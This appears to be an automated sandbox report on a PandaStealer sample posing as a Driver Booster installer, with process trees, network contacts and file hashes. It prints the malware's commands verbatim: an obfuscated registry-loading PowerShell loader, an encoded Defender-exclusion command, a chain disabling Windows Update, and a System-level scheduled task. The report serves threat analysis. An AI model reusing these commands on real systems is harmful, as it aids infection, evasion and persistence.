Malware Analysis Report

2024-09-22 15:33

Sample ID 240414-v46wkaae52
Target 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
SHA256 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
Tags
pandastealer discovery evasion exploit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00

Threat Level: Known bad

The file 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00 was found to be: Known bad.

Malicious Activity Summary

pandastealer discovery evasion exploit spyware stealer

Panda Stealer payload

PandaStealer

Possible privilege escalation attempt

Stops running service(s)

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Modifies file permissions

Reads user/profile data of web browsers

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Modifies registry class

Modifies registry key

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-14 17:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 17:33

Reported

2024-04-14 17:47

Platform

win7-20240220-en

Max time kernel

3s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

Signatures

Panda Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

PandaStealer

stealer pandastealer

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Stops running service(s)

evasion

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 1992 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 1992 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 1992 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 2880 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 1992 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 2484 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"

C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp" /SL5="$40150,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "DBassistant"

C:\Windows\system32\taskeng.exe

taskeng.exe {2C733B94-B17B-4042-ADE0-505C7207B682} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3331cd96-be95-46f9-bd19-6cee6c77ea53}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{55144820-2c5f-4067-a015-a50dd418f139}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 f0854165.xsph.ru udp
RU 141.8.193.236:80 f0854165.xsph.ru tcp
US 8.8.8.8:53 update.iobit.com udp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp
US 152.199.20.140:80 update.iobit.com tcp

Files

memory/1992-0-0x0000000000400000-0x00000000022FF000-memory.dmp

\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

MD5 ccc48304afa2e7c58492babc297db8a4
SHA1 decd98730cf34e1567965f6fb7085569fc1053e8
SHA256 e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910
SHA512 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

memory/2880-8-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

MD5 6a4308bc229b64cf5bc6d359056b8980
SHA1 29f6484fafd50f0c00b5be01d97e82ffeda6f75b
SHA256 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7
SHA512 f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp

MD5 68b52a0b8e3d45bf3b520a0e7f16dad1
SHA1 e50408326eafb5ca8adc70db29c33b64e25bbbbd
SHA256 b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b
SHA512 b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

MD5 0e31bfc197cf7557b6ba5c18ecb1e5b2
SHA1 78ec7c8f28568611cf524f30b67875e031a09cb2
SHA256 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78
SHA512 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

memory/2484-40-0x000000013F820000-0x000000013FAD4000-memory.dmp

memory/2484-46-0x000000001C250000-0x000000001C4EA000-memory.dmp

memory/2484-48-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2484-47-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

memory/2512-49-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1760-55-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/1760-57-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

memory/1760-56-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1760-58-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-59-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-60-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

memory/1760-61-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-62-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp\DriverBooster.exe

MD5 5ff2b8b8bf24896093f7e44374fabf95
SHA1 69bc407fe124e7e475a90cb9702f768a4b412da3
SHA256 77b5f3864c9ded87ccdc2c550d1ac107c918c224ee9aeada6f3fd8834f935d91
SHA512 391ea2b19131d73f194afc2ddd594f8648e6acd9c0a7fabffcff1fb27d83ddbd91367bfbf32f7b354d31ae931dea04b73045236eb98848d65fe4de8ee02fb50e

C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe

MD5 3d403676517f6a99de035a04dc3f3f82
SHA1 ed69d8f485374dfb58a5b651b1f3f1bab8ee9541
SHA256 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e
SHA512 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

memory/1596-98-0x0000000000270000-0x0000000000271000-memory.dmp

memory/1596-177-0x0000000002F00000-0x0000000002F40000-memory.dmp

memory/2512-191-0x0000000000400000-0x0000000000531000-memory.dmp

memory/2880-193-0x0000000000400000-0x000000000042C000-memory.dmp

memory/2484-194-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

C:\ProgramData\IObit\iobitpromotion.ini

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\1713116764\ENGLISH.lng

MD5 8e7f2723f0e72bc6abefca738c9c1ca4
SHA1 969a4a6f31e146040a101d526886ede9a7c5c432
SHA256 f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b
SHA512 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

memory/2484-214-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2676-216-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-217-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-221-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-222-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-220-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-219-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-218-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2484-215-0x0000000000690000-0x0000000000696000-memory.dmp

memory/2676-224-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

memory/2676-223-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-230-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-240-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2484-242-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

memory/2676-228-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-226-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1596-247-0x0000000000400000-0x0000000000A17000-memory.dmp

memory/2556-248-0x000000013F450000-0x000000013F704000-memory.dmp

memory/2556-249-0x000007FEF4990000-0x000007FEF537C000-memory.dmp

memory/2208-250-0x0000000019EB0000-0x000000001A192000-memory.dmp

memory/2208-251-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/2208-253-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-252-0x00000000008C0000-0x00000000008C8000-memory.dmp

memory/2208-256-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-257-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/1596-258-0x0000000000270000-0x0000000000271000-memory.dmp

memory/2208-261-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/2312-262-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2556-264-0x0000000000EB0000-0x0000000000F30000-memory.dmp

memory/1472-266-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/2312-270-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/2208-269-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2312-268-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2208-267-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/2312-265-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2208-260-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2208-259-0x0000000001680000-0x00000000016C0000-memory.dmp

memory/2208-271-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/1472-275-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/1472-277-0x0000000072BB0000-0x000000007315B000-memory.dmp

memory/436-278-0x0000000000B70000-0x0000000000B93000-memory.dmp

memory/1596-279-0x0000000002F00000-0x0000000002F40000-memory.dmp

memory/436-282-0x0000000000B70000-0x0000000000B93000-memory.dmp

memory/2312-283-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/436-285-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

memory/436-287-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/1472-281-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/1472-273-0x0000000072BB0000-0x000000007315B000-memory.dmp

memory/2312-272-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2208-255-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-254-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/436-292-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

memory/480-290-0x00000000001E0000-0x000000000020A000-memory.dmp

memory/436-289-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/768-315-0x0000000000230000-0x000000000025A000-memory.dmp

memory/688-313-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/688-311-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/688-309-0x00000000003E0000-0x000000000040A000-memory.dmp

memory/616-306-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/616-304-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/616-302-0x0000000000410000-0x000000000043A000-memory.dmp

